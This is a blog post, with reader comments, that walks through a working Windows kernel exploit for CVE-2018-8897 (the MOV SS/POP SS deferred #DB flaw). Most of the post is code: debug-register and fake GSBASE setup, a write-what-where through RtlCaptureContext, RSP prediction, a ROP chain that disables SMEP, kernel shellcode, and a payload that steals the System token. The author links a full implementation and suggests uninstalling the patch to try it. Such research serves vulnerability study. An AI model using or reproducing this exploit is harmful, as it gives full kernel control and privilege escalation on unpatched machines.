Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post.
Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation.
Final source code can be found at the bottom.
0x0: Setting Up the Basics
The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time.
However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode.
We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised.
As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted.
All of this can be done in a few lines like shown below:
#include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } }
This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit.
Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx.
We can utilize a small IDA script to step to relevant parts faster:
#include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } }
0x1: Fixing the KPCR Data
Here are the few cases we have to modify GSBASE contents to pass through successfully:
– KiDebugTrapOrFault
KiDebugTrapOrFault: ... MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h
Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80.
– KiExceptionDispatch
KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8
Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h.
– KiDispatchException
KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h]
This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it.
KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h]
0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it.
– RtlDispatchException
This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do?
There’s a weird check in the middle of the function:
char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; }
Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved.
RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException.
– KeBugCheckEx
We are finally here. Here’s the last thing we need to fix:
MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext
Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now.
0x2: and Write|What|Where
And there we go, sweet sweet blue screen of victory!
Now that everything works, how can we exploit it?
The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time.
I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit:
#include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } }
To my disappointment, there is no convenient jumps or calls. The whole output is:
- KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h
This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it.
I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses:
NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock
After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext.
How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit).
However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do.
To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made.
.text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... .text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax
We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4.
To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant.
Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it.
Thread logic will be like the following:
volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it
Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction.
We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode.
The final chain will look something like:
-- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010)
In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below:
NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); }
We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete!
Let’s make a simple demo stealing the System token:
uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken );
Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897
Credits:
- @0xNemi and @nickeverdox for finding the vulnerability
P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!
P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code:
The exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.
How did you debug it by “simulating” this situation?
Please share the debugging method.
To simply put:
1) Load unsigned kernel driver
2) Allocate memory for new GS
3) Set debug registers using __writedr
4) swapgs
5) Set gs base
6) Access the break pointed memory and raise a #DB
7) Debug and Profit.
fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap rip for #bp
fffff00e`d7a1bc40 0000000000000010 cs for #bp
fffff00e`d7a1bc48 0000000000000002 rflags for #bp
fffff00e`d7a1bc50 fffff00ed7a1bc68 rsp for #bp
fffff00e`d7a1bc58 0000000000000000 ss for #bp
fffff00e`d7a1bc60 0000000000000014 ????????
fffff00e`d7a1bc68 00007ff7e2261e95 –rip for ring3
fffff00e`d7a1bc70 0000000000000033 cs for ring3
fffff00e`d7a1bc78 0000000000000202 rflags for ring3
fffff00e`d7a1bc80 000000ad39b6f938 ss for ring3
so what is this “fffff00e`d7a1bc60 0000000000000014” ??
Perhaps just stack alignment?
Thank you. It is stack alignment. I just find it in Intel Manual 6.14.2 64-Bit Mode Stack Frame.
Thanks for your answer.
Finally, I debug your code in the following steps:
1. Windbg Kernel debug: ba e1 KiDebugTrapService (I use INT 2D instead of INT 3)
Simulate the #DB event which should be created by movss
2. Then in IDA remote gdb(connected VMWare debug stub): set rip to skip notify windbg the #DB event
But in this way, the REAL_TIME watchdog thread was hard to get scheduled. When I force to set the context pointer to point to the kernel stack, I can run to the kernel shell code by ROP.
Hi, bro! Your work is so good. i’m a newcomer to kernel exploit. I have some questions after reading your article.
ONE. How to ,can u explain in more details?
TWO. As im new to this area, what is the basic knowledge I need to prepare, do you have some good books or articles to recommand for me?
I would appreciate for your precious reply.
Hello, bro!
I’m a newbee too. but I did some work about the CVE. I think maybe it is useful to you..
http://x86asm.net/articles/debugging-in-amd64-64-bit-mode-in-theory/ –> You could know some details about interrupts and exceptions, debug register. I think maybe you could read the article first. Because I think it is very useful.
https://www.bromium.com/dissecting-pop-ss-vulnerability/ –> You could get some details about the vulnerability…..I really think it is very useful…
https://github.com/nmulasmajic/CVE-2018-8897 –> POC from the finder.. I read it to know why the author know how to write EXP without any details..but I can’t.
http://everdox.net/popss.pdf –> white paper.
I’m sorry. My English is so terrible… ^_^…….. .
Hello, thanks for your work.!
When I read your code from github, I could understand HANDLE(-2), I can’t understand that. The value must be -2?
Maybe I’m not good at google…I can’t find any answer about the value “-2″….
I’m sorry, my English is terrible…Looking forward to your reply!
HANDLE(-2) is equal to GetCurrentThread() 🙂
Thanks! very very thanks!!!
Hello, I’m sorry I always bother you…
When I run your code. I find that that the instruction
rdgsbase rax
can’t work.(I run the instruction in windows 7(64bit) and I sure the mode is X64..)
Then I run the instruction in windows 10(64bit), of course. The instruction work.
And I want to find another instruction to replace it. so I read Ntoskrnl.exe. find the code in function which is named “PsGetCurrentProcess”
.text:0000000140081D30 mov rax, gs:188h ; IoGetCurrentProcess
.text:0000000140081D39 mov rax, [rax+70h]
.text:0000000140081D3D retn
I think maybe I can do something like this…
lea rax, gs:188h(I know it won’t work… The instruction “mov rax, gs:00h” in visual won’t work too…)
Could you give me some tips.. Thank you very much.
And when I run your code. The code [i], [i+3],[i+7] , I think maybe it is lack of Versatility. I need to change the code like this and it will work.
if (UPsGetCurrentProcess[i] == 0x48 && UPsGetCurrentProcess[i + 1] == 0x8B && // mov rax,
UPsGetCurrentProcess[i + 4] == 0xC3) // retn
{
Offset_KThread__ApcStateFill__Process = (0x70); //I find the offset is 0x70, so I change it directly.
break;
}
Use number 4 instead of 7. I think have another method to run the code correctly in differcnt machines?
I’m sorry….I try not to ask such a stupid question again.Thank U.
I’m very sorry. I think maybe I get the answer from your github.
“Discovered the problem while doing something completely unrelated, rdgsbase / wrgsbase is not supported in Windows 7 so this exploit will not work unless you overwrite TEB instead which is not what I’m doing in the PoC”
I will try the mothods. Thank you!!!